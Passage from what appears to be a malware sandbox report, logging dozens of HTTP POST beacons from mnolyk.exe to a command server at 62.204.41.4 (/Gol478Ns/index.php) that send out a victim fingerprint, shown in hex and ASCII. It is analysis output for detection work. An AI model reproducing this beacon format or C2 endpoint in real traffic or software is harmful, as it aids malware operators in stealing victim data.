                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:08.566998959 CET | 500 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:08 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        3 | 192.168.2.5 | 49693 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:29.330240011 CET | 203 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:29.404603004 CET | 204 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        30 | 192.168.2.5 | 49720 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:38.844825983 CET | 230 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:38.909267902 CET | 231 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        300 | 192.168.2.5 | 49990 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:08.739973068 CET | 501 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:08.803266048 CET | 501 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:08 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        301 | 192.168.2.5 | 49991 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:08.977328062 CET | 502 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:09.042072058 CET | 502 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:09 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        302 | 192.168.2.5 | 49992 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:09.210071087 CET | 503 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:09.275585890 CET | 503 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:09 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        303 | 192.168.2.5 | 49993 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:09.446811914 CET | 504 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:09.510627985 CET | 504 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:09 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        304 | 192.168.2.5 | 49994 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:09.678155899 CET | 505 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:09.741938114 CET | 505 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:09 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        305 | 192.168.2.5 | 49995 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:09.929475069 CET | 506 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:09.995454073 CET | 506 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:09 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        306 | 192.168.2.5 | 49996 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:10.162120104 CET | 507 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:10.226402044 CET | 507 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:10 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        307 | 192.168.2.5 | 49997 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:10.399966002 CET | 508 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:10.464658976 CET | 508 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:10 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        308 | 192.168.2.5 | 49998 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:10.629964113 CET | 509 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:10.693331003 CET | 509 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:10 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        309 | 192.168.2.5 | 49999 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:11.060496092 CET | 510 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:11.126276970 CET | 510 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        31 | 192.168.2.5 | 49721 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:39.081762075 CET | 231 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:39.150372028 CET | 232 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        310 | 192.168.2.5 | 50000 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:11.377142906 CET | 511 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:11.442153931 CET | 511 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        311 | 192.168.2.5 | 50001 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:11.711180925 CET | 512 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:11.775501966 CET | 512 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        312 | 192.168.2.5 | 50002 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:12.405675888 CET | 513 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:12.469245911 CET | 513 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:12 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        313 | 192.168.2.5 | 50003 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:13.453553915 CET | 514 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:13.520159006 CET | 514 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:13 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        314 | 192.168.2.5 | 50004 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:13.908823967 CET | 515 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:13.973970890 CET | 515 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:13 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        315 | 192.168.2.5 | 50005 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:14.255721092 CET | 516 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:14.322971106 CET | 516 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:14 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        316 | 192.168.2.5 | 50006 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:14.489864111 CET | 517 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:14.553904057 CET | 517 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:14 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        317 | 192.168.2.5 | 50007 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:14.733546972 CET | 518 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:14.796650887 CET | 518 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:14 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        318 | 192.168.2.5 | 50008 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:14.977536917 CET | 519 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:15.043209076 CET | 519 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        319 | 192.168.2.5 | 50009 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:15.225596905 CET | 520 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:15.291661024 CET | 520 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
